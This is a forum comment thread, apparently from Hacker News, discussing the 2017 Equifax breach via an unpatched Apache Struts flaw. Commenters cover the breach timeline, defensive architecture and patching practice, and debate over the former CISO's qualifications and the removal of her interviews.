How many jobs are out there for people who tell the "business" people what they want to hear, versus people who tell them hard truths about security? How many businesses succeed despite lax security -- gambling irresponsibly, yet winning?
Yep. You can do all that. At the end of it, a box somewhere needs to be able to access the data. That box has access. You handwave it as single-person-at-a-time queries. But on any given day, they have to run tens or hundreds of thousands of those queries. Even if people aren't accessing their credit info, there is plenty of automation that does. Meaning if you pop that single person query box, you can scale up the queries by a factor of ten without raising any flags directly.
It's much better, certainly. Companies should do that. But it's not obviously a panacea.
Conceivably, the attackers spent the 75 days downloading the 143,000,000 records, 2,000,000 records per day, and managed to trigger no scaling alarms as a result. Or perhaps there were no alarms. I wonder if we'll ever know.
Given the vagueness of their statements about the 143M records which "may" have been affected, it seems likely that they weren't logging the relevant queries in any useful way, and that is definitely an architectural failure.
TFA says Equifax learned of the breach by detecting anomalous traffic. I'd say there was an alarm, but it didn't do anything to actually stop the attack.
I worked for a company that was doing at least 100k credit checks each day. A lot of it was batched - we would get a file with 25k records and had to process it and send back the results (usually HTML reports and/or decisions based on them).
What I want to say is, it wouldn't surprise me to hear that the three main bureaus process millions of requests per day.
Oh, and also - all bureaus were replying to a request in less than a second. Quite impressive.
Thank you for backing up my claim with data. I was admittedly making an educated guess, but there was a nagging "hundreds of thousands? Are you sure?" feeling.
This underscores the importance of figuring out a better architecture. And not just for credit bureaus.
It is remarkable how resistant people are to the idea that you need to be patient while the world changes. Everyone is out for blood and gives not a fleeting thought about what would come after such a purge.
Batch processing on encrypted data is absolutbly ok. For example, you can just pull row-level keys and run your audited and signed binary. Also the pipeline should be put away from the frontend.
I'm not an expert but I think it should already be documented in the compliance doc.
If you can batch process the dataset, an attacker can do the same thing. They take whatever creds the batch script is using and use them directly. If the program only runs from a certain box, then they run their modified script on that box.
"Well don't let that happen!" Nope, not that easy. This threat model concedes that the hackers have RCE. They're on your network. That's why they can do this.
"All binaries are audited and signed.", which makes it trackable. And the runtime environment is also isolated and uses different set of access permissions. I'm not saying it is impossible. Just layers and layers. For internal stuffs, Google's beyondcorp is a good start.
There is no such thing as a runtime environment that (a) attackers gained RCE into, and (b) the box with the sensitive data can verify the incoming connection is from an audited, signed binary.
Simply put: if you have RCE into an app, then that breaks all the guarantees of that audited, signed binary. You can make it sing and dance and ask for a thousand rows instead of ten; you can do whatever you want to it. The modifications happen in memory, not on disk, so even if they don't persist you can still modify the app.
Why would you ever allow public web access to a machine that can do that level of batch processing? That sort of thing should be accessible only through internal-only tools protected by a VPN.
You'd be amazed at how easy it is to exploit internal tools once you're inside someone's network. Internal tools were the juiciest targets: a perfect storm of "created by an unqualified team that no longer works here" and "nobody realized it's still been running for a year."
It can work, but evidence seems to imply this strategy makes the situation worse. I'm not sure what to do with this information other than to relay the experience. It's one of those tricky counterintuitive facts.
Oh, definitely agree. But I'm talking about "internal" tools that aren't actually internal, but are exposed on the public internet. At least if they're behind a VPN there's a hurdle to jump before you get to those tools.
I disagree with the fatalist tone. Sure, it can be hard for big, slow moving businesses to take a time out from writing million dollar checks to C-suite executives to spend money on a competent operations and security team. But it can happen and in this case it should have happened.
I don't think "better architecture" is handwavy. If you have old legacy apps that can't be updated and maintained, don't provide them with a path to the public internet. Or front then with some infrastructure and adequate alarms to detect something going wrong.
I think it's reasonable to respond to a CVE with an update to your app or infrastructure within one week. Most of the time rapid testing will be fine as your patching a library or component, like Struts or Tomcat.
These companies are hardly providing 100% uptime, in the case where an update like this needs a rollback, it won't be a big deal. If you have a good team and you spend the money on them.
Companies that store personal information at that level should be required to implement PCI-DSS level security. This includes going through the auditing process.
You can work to not implement the security standards, and then try to fake your way through the audit. At that point you are not ignorant of proper security, you are actively endangering the users, and your right to hold PII (Personally Identifiable Information) should be revoked.
I don't buy your observation that all big-corps are kind of equally sloppy security-wise. Here are 2 examples:
- Equifax login form does not use STS header.
- equifax.com/business exposes full server version (Server:Apache/2.4.27 (Win64) OpenSSL/1.1.0f mod_log_rotate/1.0.0)
I'm not a security person but those 2 seems way out of industry standards for security-aware web services.
I was sure the vulnerability was going to be an API key hard coded in the app which allowed retrieving any credit report over the API. That the app was "merely" sending some calls unencrypted was a total let down.
API creds maybe could have been excusable as a mistake which got overlooked or even permissions which changed. In the context of a credit monitoring app, the use of HTTP is really, really, really bad and can't really be excused. It would be interesting to know if there are more issues, but a lot of white-hat researchers stay away from such things when there's no official bug bounty program because of the computer fraud and abuse act. Interacting in the API outside its intended use by the app could be considered computer intrusion and it might be advisable to stay away from legal grey areas right now when it comes to Equifax research.
My guess is the problems here were more banal: the account running apache had too much privilege (maybe even root?), and the vulnerability was left unpatched for a long time (weeks at least). If you can execute arbitrary commands on a web server it's essentially impossible for any architecture to keep your hands off any (or all) data that server needs access to for its normal functions.
If they were doing it right the DB would be encrypted and the PCI fields would be tokenized and then if you get dumps of the DB you don't have anything you can use.
Was it just a single CVE? That was the entry point, but was their network just wide open after that. Or did the have to procure more CVEs to get by ssh, firewalls, etc?
I think its about time we had the equivalent of the NTSB to review and publish, publicly, what happened and what the failures were. Nobody died but certainly many people will be affected by this for years to come.
Wow, MarketWatch is right. They are trying to erase Susan Mauldin (the former CISO), she is not even mentioned in this article. Does anyone with Google juice have a way to recover the interviews that are referenced in [1]?
I watched them before they came down on Sept 10, and they were eye opening. I can say with certainty that the transcripts are not complete, because I remember "resistance to cloud is futile" and other such gems which are nowhere to be found in the partial transcripts that you can still find on the linked archive.is pages.
Some of the best software developers I've known were music majors. I know nothing about Susan Mauldin, including any of her other qualifications or lack thereof, but implying someone is only qualified to do what their college major was tells me this author is a complete idiot.
That is not my purpose. I have no idea what her qualifications are, I saw the LinkedIn page and it contained almost no information. That is hardly relevant.
I personally believe that she was backed into a corner, based on the interviews I watched from some time before the breach (that I can't show you, and I won't link to the transcripts because I know they are incomplete and by far less impactful.)
She sounded to me, exactly like a person who was given a budget that was effectively no budget, and then put into this role because people with a larger stake were sure that she would comply when they said "this is your budget, and not a penny more." I know exactly what that is like, because I have been made CIO and put in that position before. (I'm sure she was better paid than I was...)
There is absolutely 100% a coverup going on. I am so bummed that I did not save the interviews when I first watched them. You would agree too, if I could show you.
Edit:
Here is the transcript, but with the disclaimer that it is 100% not the full transcript. Although it is in her own words. Make your own judgement about her qualifications please.
"I always say that given enough time, we can secure anything and find a way to say yes to it and business-driven CISOs are of that mind"
It's really a pretty balanced interview. This is what she said. There was a second interview, but I'm a lot more incensed that this information is being suppressed than at any one thing she says. I want to be furious when she says things like
"If a CISO can come up with a list of controls that he/she is comfortable with, then by and large the evidence proves that those controls are working effectively and are going to satisfy the elements of any framework that you use."
but all this interview really can show is that she knows some jargon, and her mindset. And I think it's really (truly, not in a figurative sense but literally) criminal that this information is suppressed. This is the case study of an interview that reveals insights from the mind of a CISO before disaster strikes... I literally don't even care that she was a Music major, how can anyone justify taking this down?
It's not just potentially criminal, it's also unconscionable. This should be preserved for posterity, I want to tar and feather the company, but I want to hear more from Susan Mauldin about what went wrong at Equifax.
I don't just want this interview back online, I want there to be a follow-up to this interview! And if it takes a pardon from Trump to make that happen, let's start the conversation.
> She sounded to me, exactly like a person who was given a budget that was effectively no budget, and then put into this role because people with a larger stake were sure that she would comply when they said "this is your budget, and not a penny more." I know exactly what that is like, because I have been made CIO and put in that position before.
That's the root cause here. The same thing happens over and over. They find ways to save more money, get the rewards, and the rest of us get screwed.
Bingo. You said it, that's exactly why I want to hear more from Susan Mauldin. (That, and the fact that there's someone evidently who doesn't want to hear more from Susan Mauldin...)
Edit: Well, I found one video (11m30s), were there more?
-----
Edit:
From a quick check, this seems to be the same interview that was transcribed, though I'm not sure if it's the entire interview or even the one you were looking for:
There was a second interview with Cazena that looked a lot like the first interview, but the topic was different. It looked like they were possibly recorded on the same day.
Edit: Bless you for doing this, however you found it.
I haven't watched it yet, but I fetched a copy. (Edit: it looks like the first interview.)
If it matches the transcript, the one I'm looking for has the expression "resistance to the cloud is futile" in it (which I didn't see in the transcript.) It might have been the follow-up interview that had this phrase in it. From reading the first transcript, it looked pretty accurate from what I could remember.
It's too bad we don't have that transcript. I honestly can't remember much about that second interview. Didn't think I'd be here in this position today, trying to retrieve it for the public interest.
Edit: This one does have the quote about the Borg in it. So I remember absolutely nothing about Part 2 of the interview, and we still don't have a copy. But this is something I can't find anywhere else on the internet for now. Thanks!!!
Yeah, I found their article from links here so I reached out to them via email right after posting it here. According to a later email, they independently found my HN above post a bit later.
Looks like the embedded version on their page is missing about 1m30s of the interview, though.
None of the listing above told us what exactly she is doing as VP of those firms. No detail on whether she fulfill a tenichal role or administrative one.
Well sure, I don't want to blame a person though. I'm sure there's enough blame to go around. It sure looks fishy though that this person is being swept under the rug.
Either she is the scapegoat, or she knows who is responsible for this. I'd love to have her on record to testify about the culture and what happened some time before they've effectively paid her to go away, and stashed her somewhere off the coast of Bermuda.
Equifax "believes" that the hackers got in on May 13. They had some kind of intrusion detection system that finally detected the intrusion on July 29. 5 months after the "Critical" CVE alert went out. During that time security vendors were adding firewall rules to stop the attack. But apparently Equifax didn't have any other security in front of the Struts server.
That just seems like unconscionable incompetence and malpractice for such a high value target.
> They had some kind of intrusion detection system that finally detected the intrusion on July 29.
If they had some sort of intrusion detection system, I gotta think they would have picked up on this in days, not more than 2 months later.
I feel like this is one of those situations where a dev is saying something like "where is all of the CPU on this database going?" or "Why is the network connection so slow?" and digs into it and finds some strange behavior...
- In addition, credit card numbers for approximately 209,000 U.S. consumers, and certain dispute documents with personal identifying information for approximately 182,000 U.S. consumers, were accessed.
This looks really bad. I don't know what's the point of letting them operate anymore. They utterly failed on the single thing they were supposed to do.
The business they are in is supplying information to creditors about the credit-worthiness of potential customers. AFAIK they have succeeded at this.
I don't want to downplay their security failure. It's obviously really bad, but saying that security was the "single thing they were supposed to do" is false.
You are right, it was a hyperbole, but I still don’t see why they should be allowed to continue operating. Would you let a bank continue to operate after they have lost all their money?
Never mind, I guess too big to fail applies here as well.
Actually looking at the CVE made my stomach drop. That is a horrible horrible bug. Getting access to the shell while under the web app user's environment potentially means that all secrets were available either in the app server administration, the user environment, or in a readable file on the system. Effing yikes.
Also knowing how JNDI usually gets configured on app servers (sometimes with credentials and all) would have made recon ridiculously easy.
I think some have alluded to it, but what some people in the comments don't seem to understand is that RCE is an "all bets are off" type of situation. DEFCON 1 to be sure. Prevention is really the only good answer.
Failure to apply a patch for a two month old bug led to this entire nightmare scenario. What are some best practices to ensure that ones dependencies are always up to date?
Equifax makes their partners have a fully implemented and tested patch management program and audits annually (or via a third party) that you stick to it, making this situation even more hilarious.
Failure to patch wasn't the cause of this breach. The causes of this breach were:
1. Reliance on a consumer-grade component in a security-critical system holding high-value data.
The portal should have had a small, audited code base with secure coding techniques and minimal reliance on third-party components.
2. Excessive attack surface on a system holding high-value data.
The machine hosting the portal should never have had read access to SSNs. Sensitive data should have been "thrown over the wall" to a secure backend with a constrained interface. This would have greatly reduced the scope of the breach.
If you're lazy and dealing with a non-critical system, `yum update --security -y` as a nightly cron job goes a long way.
If you're working on something important, say critical national economic infrastructure, you do the equivalent with automated staging and testing happening before any potentially breaking changes are made to live servers.
Yum isn't going to patch Struts, though. That's an application package.
There are services that monitor your package configuration(s) and let you know when something has been updated.
There are also mailing lists. Unless you're a Node developer, you probably only have a couple dozen dependencies in your app. Subscribe to them.
Finally, you can just check in your lockfile and update packages as part of your dev builds, then commit it whenever something changes. Your CI/CD will make sure you are always running the latest version of every application dependency in production.
Although I'm sure Equifax is not going to be very forthcoming about this aspect of it, not having plaintext passwords visible after logging in as admin/admin also helps.
Nobody's saying music majors are incompetent. But this woman's sole qualification is that. She is not a "kernel dev hacker" AFAICT. Do you know if she is in any way qualified to be CSO of a huge corp handling so much sensitive customer data?
She held another position as director of security, but no hands on technical roles ever. It really looks like the resume of a middle manager who moved to CSuite. I didn't see anything that indicated she was technical
Don't hire an unqualified person. These two things are not equivalent. Their major in college is only one small part of that picture.
I have known people without degrees (or without relevant ones) that learned on their own and were great. I have known people with a CS degree that were terrible.
For everyone patting themselves on the back for how much better they are at securing their data realize that for way over 80% of incidents the attack vector is email and social engineering. Look at Red team exercises of competent teams and try to honestly answer the question would have they succeed with that tactic at your company. So yes having much better practices vs what we see here is very important but will not really help much if you are being targeted by a competent adversary.
Gotta admire the artful way they gave the appearance of disclosure while avoiding answering the most damning question: why did it take so long for them to patch Struts?
"The particular vulnerability in Apache Struts was identified and disclosed by U.S. CERT in early March 2017."
"Equifax's Security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure."
?????????!!!!!!??????
"While Equifax fully understands the intense focus on patching efforts, the company's review of the facts is still ongoing."
I have a different question. So here's their timeline:
MARCH 2017 - Vuln in Struts is disclosed by CERT.
MAY 13 - Initial intrusion happens according to FireEye's later analysis
JULY 29 - Equifax notices weird activity.
JULY 30 - Equifax notices more weird activity.
JULY 30 - Equifax takes down affected web site
JULY 30ish? - Equifax realized vuln was Struts. Patches. Puts site right back up.
AUG 2 - Hire FireEye to check things out
(weeks) - FireEye assesses situation and presumably Equifax panics
SEP 7 - Equifax makes intrusion public, offers self-described "comprehensive package" including the web site "so that consumers can quickly and easily find the information they need".
At SOME point, they kind of shove in the statement that following entities were notified:
* FBI
* all U.S. State Attorneys General
* other federal regulators.
My question is WHEN did this happen? It's my understanding there are rules-- state and federal-- about when law enforcement (and affected parties) need to be notified on a breach of this size involving this type of sensitive information.
I hope Equifax will be learning from this, but can you tell your CEO that your core business must be shut down for 3 weeks as you upgrade and rebuild the system?
Yes, the risk is much higher than the cost. From the article:
> The company's internal review of the incident continued. Upon discovering a vulnerability in the Apache Struts web application framework as the initial attack vector, Equifax patched the affected web application before bringing it back online.
That bullet point lies between the "July 30th" and "August 2nd" bullet points. Based on that timeline, the vulnerability took days to patch.
The reason they don't is that they just don't care... and for their business that's the rational decision. Data security isn't as core to their business as it is to a bank. If a bank has a breach, bank accounts get drained. If Equifax has a breach, it's annoying but manageable fines and their CEO gets grilled in a few congressional hearings.
Equifax's core business is about giving out credit scores. I'd bet their biggest fear is giving someone a high score when they deserve a low one. Data breaches, moderately inaccurate information... a nuisance, but a sideshow.
Having a remote execution exploit shouldn't mean keys to the kingdom. I find it hard to believe that this company whose whole business is electronic didn't adapt it's technology stack to remedy this type of attack limiting the scope of a data leak. I wouldn't be surprised if struts has another exploit of similar magnitude, what then?
They might as well be running their business on a cluster of tomcat servers sitting atop sqlite.
Hopefully they don't recover from this - they should not have the data they posses if they cannot mitigate risk.
They are really in deep trouble and need to manage the story carefully. If people on a broad basis start freezing their credit history (one of the most effective means to protect against abuse) their and their competitors ability to sell data to other parties will suffer (see also https://wolfstreet.com/2017/09/15/equifax-sacks-2-executives... )
What about storing sensitive data in something like a HSM, which rate-limits access rate, so you could only lets say access 10000 records per day.
Yes, developing against such a system might be annoying (think about updating a new piece of data for all records).
But it feels to me that we need a way to rate-limit access to sensitive data, to prevent wholesale dump in a short time. But you still need other systems in place, to prevent a hacker lurking around for months until it gets all the data.
I just had a scamming debt collector call me about a debt I already paid off to another collection company. They had all the right information. I suspect it has to do with the hack. Watch out for First Equity Alliance.
For example, are the items in DB encrypted? Are database backups encrypted? Are different items encrypted using different keys? I don't think EFX did it right.